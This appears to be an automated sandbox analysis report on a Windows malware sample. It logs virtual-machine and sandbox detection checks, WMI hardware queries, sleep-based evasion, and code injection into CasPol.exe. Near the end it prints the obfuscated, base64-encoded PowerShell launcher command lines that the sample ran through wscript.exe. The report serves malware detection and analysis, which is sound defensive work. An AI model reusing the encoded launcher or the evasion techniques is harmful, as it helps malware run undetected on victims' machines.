Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: powershell.exe, 00000014.00000002.2190887243.0000000008708000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEENT

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1900	Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8544	Thread sleep count: 9229 > 30

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.dll

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8837
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 9229

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 26_2_1DAD0C40 sldt word ptr [eax]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

System information queried: ModuleInformation

Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 0000001A.00000002.5720812627.00000000014D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000014.00000002.2190887243.0000000008708000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exeent
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000014.00000002.2223774284.000000000B839000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process token adjusted: Debug

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 26_2_20B00040 LdrInitializeThunk,

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1350000

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.0.cs

Jump to dropped file

Encrypted powershell cmdline option found

Source: C:\Windows\System32\wscript.exe	Process created: Base64 decoded $Miljvrnetl = @'Im$HauStvAsoGrrFi9Ti Bi=af Af"AfVDiiRerSptAfuLoaRelKaAPtlAglReoRecPh"StAKodChdLu-BoTIdylepRieAn eq-SkTNeyUnpEseStDCaeOpfVeiPonDeiIdtStiAtoNonKe Ch@Ve"uduFosReiAknafgAs LeSOpyCysSetDieAnmPr;tiuFasApiInnopgIn BaSOpyAksUntVieMemVe.veRovuConextTaiDimLaeSt.VeIBinKotGoeCirAnoFlpYoSTheUnreivUdiGscSheRosPl;OppSyuRabFalMaiWicun AusIntPoaUptSaiGrcDo skcrilMiaWosFrsin StCGilVoaSudInoMygGteStnAreFatLo1Sp{As[GnDbelUnlBuIFymDopFaoVerTrtUn(Ph"KeuUisSuePsrFn3Ap2sk"tr)Gr]EnpPiuOpbStlsaiSpcVi SusPotHaaSktBeiSccUn DieErxPutSveArrWanIn GgiPenMatUn trCPirAaeDeaSltSteKlMBuDPlIinWUniElnstdReoVawMa(LaiAnnSktSt BeNFlvUnhIriEmeCo,AniChnPrtDi FoHLaeKlaBe,driTanFotBe RehPaaFotafcBrhTr,LaiBrnFotTe UnPToiBonMaiDi,MeiNonFjtCh duOMavHeeOrrSaiSl,FoiNanretOv PeRuneAncObiMotElapa,ReiSanCatHa PrOGopAukSnrNo,BrimanIntDa AuCRirProHacHeksk,akiRunHytMe MaAPhuNatYooAssSd,GuiAfnAptSk UnRPleAftSkrWr)Op;Gl[TaDTelHolAnIDomSnpNooaurSktOc(Gl"LiwHyiSanObmacmBa.SmdphlOnlPa"al)Ex]ArpMouSibAalTeiDicRi StsDetMeaCutBeiThcLa CoeDaxErttoeTarAmnRu AriGrnGrtLo heGLeeTatAqDEkrMyiDovjoeHorLiMDooMedEnuFulLieNoHunaVrnKadHelVeeRe(OpiklnKbtUn DaDTeiVrsTa4St0ce)Qu;Ek[anDAflLolUnIHlmEfpUnoPurYntTi(Ba"GauBlsVeeDorUd3Ar2So"Da)Gr]BepBouSkbNelUriOucRa JusamtBraFatSciFicAg IteMaxMotReeDergnnUd CliBrnAdtKu BrIPasUnDHalAsglaBVgufatAbtPsoTrnDeCovhEreStcFakBieDedTi(FoiEmnAltBe PaLTiyNosSakPiust,FoigrnUdtfu AnSImiPonAfiTjsDi9Fe4Ap)af;Sp[FlDTilsalSiISpmBrpLgoEkrPrtOv(Ul"UnAAnDKuVPlABiPHyICo3Ca2Pa.RiDDiLReLda"Sp)Pr]Sup
Source: C:\Windows\System32\wscript.exe	Process created: Base64 decoded $Miljvrnetl = @'Im$HauStvAsoGrrFi9Ti Bi=af Af"AfVDiiRerSptAfuLoaRelKaAPtlAglReoRecPh"StAKodChdLu-BoTIdylepRieAn eq-SkTNeyUnpEseStDCaeOpfVeiPonDeiIdtStiAtoNonKe Ch@Ve"uduFosReiAknafgAs LeSOpyCysSetDieAnmPr;tiuFasApiInnopgIn BaSOpyAksUntVieMemVe.veRovuConextTaiDimLaeSt.VeIBinKotGoeCirAnoFlpYoSTheUnreivUdiGscSheRosPl;OppSyuRabFalMaiWicun AusIntPoaUptSaiGrcDo skcrilMiaWosFrsin StCGilVoaSudInoMygGteStnAreFatLo1Sp{As[GnDbelUnlBuIFymDopFaoVerTrtUn(Ph"KeuUisSuePsrFn3Ap2sk"tr)Gr]EnpPiuOpbStlsaiSpcVi SusPotHaaSktBeiSccUn DieErxPutSveArrWanIn GgiPenMatUn trCPirAaeDeaSltSteKlMBuDPlIinWUniElnstdReoVawMa(LaiAnnSktSt BeNFlvUnhIriEmeCo,AniChnPrtDi FoHLaeKlaBe,driTanFotBe RehPaaFotafcBrhTr,LaiBrnFotTe UnPToiBonMaiDi,MeiNonFjtCh duOMavHeeOrrSaiSl,FoiNanretOv PeRuneAncObiMotElapa,ReiSanCatHa PrOGopAukSnrNo,BrimanIntDa AuCRirProHacHeksk,akiRunHytMe MaAPhuNatYooAssSd,GuiAfnAptSk UnRPleAftSkrWr)Op;Gl[TaDTelHolAnIDomSnpNooaurSktOc(Gl"LiwHyiSanObmacmBa.SmdphlOnlPa"al)Ex]ArpMouSibAalTeiDicRi StsDetMeaCutBeiThcLa CoeDaxErttoeTarAmnRu AriGrnGrtLo heGLeeTatAqDEkrMyiDovjoeHorLiMDooMedEnuFulLieNoHunaVrnKadHelVeeRe(OpiklnKbtUn DaDTeiVrsTa4St0ce)Qu;Ek[anDAflLolUnIHlmEfpUnoPurYntTi(Ba"GauBlsVeeDorUd3Ar2So"Da)Gr]BepBouSkbNelUriOucRa JusamtBraFatSciFicAg IteMaxMotReeDergnnUd CliBrnAdtKu BrIPasUnDHalAsglaBVgufatAbtPsoTrnDeCovhEreStcFakBieDedTi(FoiEmnAltBe PaLTiyNosSakPiust,FoigrnUdtfu AnSImiPonAfiTjsDi9Fe4Ap)af;Sp[FlDTilsalSiISpmBrpLgoEkrPrtOv(Ul"UnAAnDKuVPlABiPHyICo3Ca2Pa.RiDDiLReLda"Sp)Pr]Sup

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noexit -encodedcommand "jabnagkababqahyacgbuaguadabsacaapqagaeaajwanaaoasqbtacqasabhahuauwb0ahyaqqbzag8arwbyahiargbpadkavabpacaaqgbpad0ayqbmacaaqqbmaciaqqbmafyarabpagkaugblahiauwbwahqaqqbmahuatabvageaugblagwaswbhaeeauab0agwaqqbnagwaugblag8augblagmauaboaciacgbtahqaqqblag8azabdaggazabmahualqbcag8avabjagqaeqbsaguacabsagkazqbbag4aiablahealqbtagsavaboaguaeqbvag4acabfahmazqbtahqarabdageazqbpahaazgbwaguaaqbqag8abgbeaguaaqbjagqadabtahqaaqbbahqabwboag8abgblaguaiabdaggaqabwaguaigakahuazab1aeyabwbzafiazqbpaeeaawbuageazgbnaeeacwagaewazqbtae8acab5aemaeqbzafmazqb0aeqaaqblaeeabgbtafaacga7aaoadabpahuargbhahmaqqbwagkasqbuag4abwbwagcasqbuacaaqgbhafmatwbwahkaqqbrahmavqbuahqavgbpaguatqblag0avgblac4adgblafiabwb2ahuaqwbvag4azqb4ahqavabhagkarabpag0atabhaguauwb0ac4avgblaekaqgbpag4aswbvahqarwbvaguaqwbpahiaqqbuag8argbsahaawqbvafmavaboaguavqbuahiazqbpahyavqbkagkarwbzagmauwboaguaugbvahmauabsadsacgbpahaacabtahkadqbsageaygbgageababnageaaqbxagkaywb1ag4aiabbahuacwbjag4adabqag8ayqbvahaadabtageaaqbhahiaywbeag8aiabzagsaywbyagkababnagkayqbxag8acwbgahiacwbpag4aiabtahqaqwbhagkababwag8ayqbtahuazabjag4abwbnahkazwbhahqazqbtahqabgbbahiazqbgageadabmag8amqakafmacab7aeeacwbbaecabgbeagiazqbsafuabgbsaeiadqbjaeyaeqbtaeqabwbwaeyayqbvafyazqbyafqacgb0afuabgaoafaaaaaiaesazqb1afuaaqbzafmadqblafaacwbyaeyabgazaeeacaayahmaawaiahqacgapaecacgbdaeuabgbwafaaaqb1ae8acabiafmadabsahmayqbpafmacabjafyaaqagafmadqbzafaabwb0aegayqbhafmaawb0aeiazqbpafmaywbjafuabgagaeqaaqblaeuacgb4afaadqb0afmadgblaeeacgbyafcayqbuaekabgagaecazwbpafaazqbuae0ayqb0afuabgagahqacgbdafaaaqbyaeeayqblaeqazqbhafmabab0afmadablaesababnaeiadqbeafaababjagkabgbxafuabgbpaeuababuahmadabkafiazqbvafyayqb3ae0ayqaoaewayqbpaeeabgbuafmaawb0afmadaagaeiazqboaeyabab2afuabgboaekacgbpaeuabqblaemabwasaeeabgbpaemaaabuafaacgb0aeqaaqagaeyabwbiaewayqblaesababhaeiazqasagqacgbpafqayqbuaeyabwb0aeiazqagafiazqboafaayqbhaeyabwb0ageazgbjaeiacgboafqacgasaewayqbpaeiacgbuaeyabwb0afqazqagafuabgbqafqabwbpaeiabwbuae0ayqbpaeqaaqasae0azqbpae4abwbuaeyaagb0aemaaaagagqadqbpae0ayqb2aegazqblae8acgbyafmayqbpafmabaasaeyabwbpae4ayqbuahiazqb0ae8adgagafaazqbsahuabgblaeeabgbjae8aygbpae0abwb0aeuababhahaayqasafiazqbpafmayqbuaemayqb0aegayqagafaacgbpaecabwbwaeeadqbrafmabgbyae4abwasaeiacgbpag0ayqbuaekabgb0aeqayqagaeeadqbdafiaaqbyafaacgbvaegayqbjaegazqbrahmaawasageaawbpafiadqbuaegaeqb0ae0azqagae0ayqbbafaaaab1ae4ayqb0afkabwbvaeeacwbzafmazaasaecadqbpaeeazgbuaeeacab0afmaawagafuabgbsafaabablaeeazgb0afmaawbyafcacgapae8acaa7aaoarwbsafsavabhaeqavablagwasabvagwaqqbuaekarabvag0auwbuahaatgbvag8ayqb1ahiauwbrahqatwbjacgarwbsaciatabpahcasab5agkauwbhag4atwbiag0ayqbjag0aqgbhac4auwbtagqacaboagwatwbuagwauabhaciayqbsackarqb4af0aqqbyahaatqbvahuauwbpagiaqqbhagwavablagkarabpagmaugbpacaauwb0ahmarablahqatqblageaqwb1ahqaqgblagkavaboagmatabhacaaqwbvaguarabhahgarqbyahqadabvaguavabhahiaqqbtag4augb1acaaqqbyagkarwbyag4arwbyahqatabvacaaaablaecatablaguavabhahqaqqbxaeqarqbrahiatqb5agkarabvahyaagbvaguasabvahiata
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noexit -encodedcommand "jabnagkababqahyacgbuaguadabsacaapqagaeaajwanaaoasqbtacqasabhahuauwb0ahyaqqbzag8arwbyahiargbpadkavabpacaaqgbpad0ayqbmacaaqqbmaciaqqbmafyarabpagkaugblahiauwbwahqaqqbmahuatabvageaugblagwaswbhaeeauab0agwaqqbnagwaugblag8augblagmauaboaciacgbtahqaqqblag8azabdaggazabmahualqbcag8avabjagqaeqbsaguacabsagkazqbbag4aiablahealqbtagsavaboaguaeqbvag4acabfahmazqbtahqarabdageazqbpahaazgbwaguaaqbqag8abgbeaguaaqbjagqadabtahqaaqbbahqabwboag8abgblaguaiabdaggaqabwaguaigakahuazab1aeyabwbzafiazqbpaeeaawbuageazgbnaeeacwagaewazqbtae8acab5aemaeqbzafmazqb0aeqaaqblaeeabgbtafaacga7aaoadabpahuargbhahmaqqbwagkasqbuag4abwbwagcasqbuacaaqgbhafmatwbwahkaqqbrahmavqbuahqavgbpaguatqblag0avgblac4adgblafiabwb2ahuaqwbvag4azqb4ahqavabhagkarabpag0atabhaguauwb0ac4avgblaekaqgbpag4aswbvahqarwbvaguaqwbpahiaqqbuag8argbsahaawqbvafmavaboaguavqbuahiazqbpahyavqbkagkarwbzagmauwboaguaugbvahmauabsadsacgbpahaacabtahkadqbsageaygbgageababnageaaqbxagkaywb1ag4aiabbahuacwbjag4adabqag8ayqbvahaadabtageaaqbhahiaywbeag8aiabzagsaywbyagkababnagkayqbxag8acwbgahiacwbpag4aiabtahqaqwbhagkababwag8ayqbtahuazabjag4abwbnahkazwbhahqazqbtahqabgbbahiazqbgageadabmag8amqakafmacab7aeeacwbbaecabgbeagiazqbsafuabgbsaeiadqbjaeyaeqbtaeqabwbwaeyayqbvafyazqbyafqacgb0afuabgaoafaaaaaiaesazqb1afuaaqbzafmadqblafaacwbyaeyabgazaeeacaayahmaawaiahqacgapaecacgbdaeuabgbwafaaaqb1ae8acabiafmadabsahmayqbpafmacabjafyaaqagafmadqbzafaabwb0aegayqbhafmaawb0aeiazqbpafmaywbjafuabgagaeqaaqblaeuacgb4afaadqb0afmadgblaeeacgbyafcayqbuaekabgagaecazwbpafaazqbuae0ayqb0afuabgagahqacgbdafaaaqbyaeeayqblaeqazqbhafmabab0afmadablaesababnaeiadqbeafaababjagkabgbxafuabgbpaeuababuahmadabkafiazqbvafyayqb3ae0ayqaoaewayqbpaeeabgbuafmaawb0afmadaagaeiazqboaeyabab2afuabgboaekacgbpaeuabqblaemabwasaeeabgbpaemaaabuafaacgb0aeqaaqagaeyabwbiaewayqblaesababhaeiazqasagqacgbpafqayqbuaeyabwb0aeiazqagafiazqboafaayqbhaeyabwb0ageazgbjaeiacgboafqacgasaewayqbpaeiacgbuaeyabwb0afqazqagafuabgbqafqabwbpaeiabwbuae0ayqbpaeqaaqasae0azqbpae4abwbuaeyaagb0aemaaaagagqadqbpae0ayqb2aegazqblae8acgbyafmayqbpafmabaasaeyabwbpae4ayqbuahiazqb0ae8adgagafaazqbsahuabgblaeeabgbjae8aygbpae0abwb0aeuababhahaayqasafiazqbpafmayqbuaemayqb0aegayqagafaacgbpaecabwbwaeeadqbrafmabgbyae4abwasaeiacgbpag0ayqbuaekabgb0aeqayqagaeeadqbdafiaaqbyafaacgbvaegayqbjaegazqbrahmaawasageaawbpafiadqbuaegaeqb0ae0azqagae0ayqbbafaaaab1ae4ayqb0afkabwbvaeeacwbzafmazaasaecadqbpaeeazgbuaeeacab0afmaawagafuabgbsafaabablaeeazgb0afmaawbyafcacgapae8acaa7aaoarwbsafsavabhaeqavablagwasabvagwaqqbuaekarabvag0auwbuahaatgbvag8ayqb1ahiauwbrahqatwbjacgarwbsaciatabpahcasab5agkauwbhag4atwbiag0ayqbjag0aqgbhac4auwbtagqacaboagwatwbuagwauabhaciayqbsackarqb4af0aqqbyahaatqbvahuauwbpagiaqqbhagwavablagkarabpagmaugbpacaauwb0ahmarablahqatqblageaqwb1ahqaqgblagkavaboagmatabhacaaqwbvaguarabhahgarqbyahqadabvaguavabhahiaqqbtag4augb1acaaqqbyagkarwbyag4arwbyahqatabvacaaaablaecatablaguavabhahqaqqbxaeqarqbrahiatqb5agkarabvahyaagbvaguasabvahiata

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "JABNAGkAbABqAHYAcgBuAGUAdABsACAAPQAgAEAAJwANAAoASQBtACQASABhAHUAUwB0AHYAQQBzAG8ARwByAHIARgBpADkAVABpACAAQgBpAD0AYQBmACAAQQBmACIAQQBmAFYARABpAGkAUgBlAHIAUwBwAHQAQQBmAHUATABvAGEAUgBlAGwASwBhAEEAUAB0AGwAQQBnAGwAUgBlAG8AUgBlAGMAUABoACIACgBTAHQAQQBLAG8AZABDAGgAZABMAHUALQBCAG8AVABJAGQAeQBsAGUAcABSAGkAZQBBAG4AIABlAHEALQBTAGsAVABOAGUAeQBVAG4AcABFAHMAZQBTAHQARABDAGEAZQBPAHAAZgBWAGUAaQBQAG8AbgBEAGUAaQBJAGQAdABTAHQAaQBBAHQAbwBOAG8AbgBLAGUAIABDAGgAQABWAGUAIgAKAHUAZAB1AEYAbwBzAFIAZQBpAEEAawBuAGEAZgBnAEEAcwAgAEwAZQBTAE8AcAB5AEMAeQBzAFMAZQB0AEQAaQBlAEEAbgBtAFAAcgA7AAoAdABpAHUARgBhAHMAQQBwAGkASQBuAG4AbwBwAGcASQBuACAAQgBhAFMATwBwAHkAQQBrAHMAVQBuAHQAVgBpAGUATQBlAG0AVgBlAC4AdgBlAFIAbwB2AHUAQwBvAG4AZQB4AHQAVABhAGkARABpAG0ATABhAGUAUwB0AC4AVgBlAEkAQgBpAG4ASwBvAHQARwBvAGUAQwBpAHIAQQBuAG8ARgBsAHAAWQBvAFMAVABoAGUAVQBuAHIAZQBpAHYAVQBkAGkARwBzAGMAUwBoAGUAUgBvAHMAUABsADsACgBPAHAAcABTAHkAdQBSAGEAYgBGAGEAbABNAGEAaQBXAGkAYwB1AG4AIABBAHUAcwBJAG4AdABQAG8AYQBVAHAAdABTAGEAaQBHAHIAYwBEAG8AIABzAGsAYwByAGkAbABNAGkAYQBXAG8AcwBGAHIAcwBpAG4AIABTAHQAQwBHAGkAbABWAG8AYQBTAHUAZABJAG4AbwBNAHkAZwBHAHQAZQBTAHQAbgBBAHIAZQBGAGEAdABMAG8AMQAKAFMAcAB7AEEAcwBbAEcAbgBEAGIAZQBsAFUAbgBsAEIAdQBJAEYAeQBtAEQAbwBwAEYAYQBvAFYAZQByAFQAcgB0AFUAbgAoAFAAaAAiAEsAZQB1AFUAaQBzAFMAdQBlAFAAcwByAEYAbgAzAEEAcAAyAHMAawAiAHQAcgApAEcAcgBdAEUAbgBwAFAAaQB1AE8AcABiAFMAdABsAHMAYQBpAFMAcABjAFYAaQAgAFMAdQBzAFAAbwB0AEgAYQBhAFMAawB0AEIAZQBpAFMAYwBjAFUAbgAgAEQAaQBlAEUAcgB4AFAAdQB0AFMAdgBlAEEAcgByAFcAYQBuAEkAbgAgAEcAZwBpAFAAZQBuAE0AYQB0AFUAbgAgAHQAcgBDAFAAaQByAEEAYQBlAEQAZQBhAFMAbAB0AFMAdABlAEsAbABNAEIAdQBEAFAAbABJAGkAbgBXAFUAbgBpAEUAbABuAHMAdABkAFIAZQBvAFYAYQB3AE0AYQAoAEwAYQBpAEEAbgBuAFMAawB0AFMAdAAgAEIAZQBOAEYAbAB2AFUAbgBoAEkAcgBpAEUAbQBlAEMAbwAsAEEAbgBpAEMAaABuAFAAcgB0AEQAaQAgAEYAbwBIAEwAYQBlAEsAbABhAEIAZQAsAGQAcgBpAFQAYQBuAEYAbwB0AEIAZQAgAFIAZQBoAFAAYQBhAEYAbwB0AGEAZgBjAEIAcgBoAFQAcgAsAEwAYQBpAEIAcgBuAEYAbwB0AFQAZQAgAFUAbgBQAFQAbwBpAEIAbwBuAE0AYQBpAEQAaQAsAE0AZQBpAE4AbwBuAEYAagB0AEMAaAAgAGQAdQBPAE0AYQB2AEgAZQBlAE8AcgByAFMAYQBpAFMAbAAsAEYAbwBpAE4AYQBuAHIAZQB0AE8AdgAgAFAAZQBSAHUAbgBlAEEAbgBjAE8AYgBpAE0AbwB0AEUAbABhAHAAYQAsAFIAZQBpAFMAYQBuAEMAYQB0AEgAYQAgAFAAcgBPAEcAbwBwAEEAdQBrAFMAbgByAE4AbwAsAEIAcgBpAG0AYQBuAEkAbgB0AEQAYQAgAEEAdQBDAFIAaQByAFAAcgBvAEgAYQBjAEgAZQBrAHMAawAsAGEAawBpAFIAdQBuAEgAeQB0AE0AZQAgAE0AYQBBAFAAaAB1AE4AYQB0AFkAbwBvAEEAcwBzAFMAZAAsAEcAdQBpAEEAZgBuAEEAcAB0AFMAawAgAFUAbgBSAFAAbABlAEEAZgB0AFMAawByAFcAcgApAE8AcAA7AAoARwBsAFsAVABhAEQAVABlAGwASABvAGwAQQBuAEkARABvAG0AUwBuAHAATgBvAG8AYQB1AHIAUwBrAHQATwBjACgARwBsACIATABpAHcASAB5AGkAUwBhAG4ATwBiAG0AYQBjAG0AQgBhAC4AUwBtAGQAcABoAGwATwBuAGwAUABhACIAYQBsACkARQB4AF0AQQByAHAATQBvAHUAUwBpAGIAQQBhAGwAVABlAGkARABpAGMAUgBpACAAUwB0AHMARABlAHQATQBlAGEAQwB1AHQAQgBlAGkAVABoAGMATABhACAAQwBvAGUARABhAHgARQByAHQAdABvAGUAVABhAHIAQQBtAG4AUgB1ACAAQQByAGkARwByAG4ARwByAHQATABvACAAaABlAEcATABlAGUAVABhAHQAQQBxAEQARQBrAHIATQB5AGkARABvAHYAagBvAGUASABvAHIATA
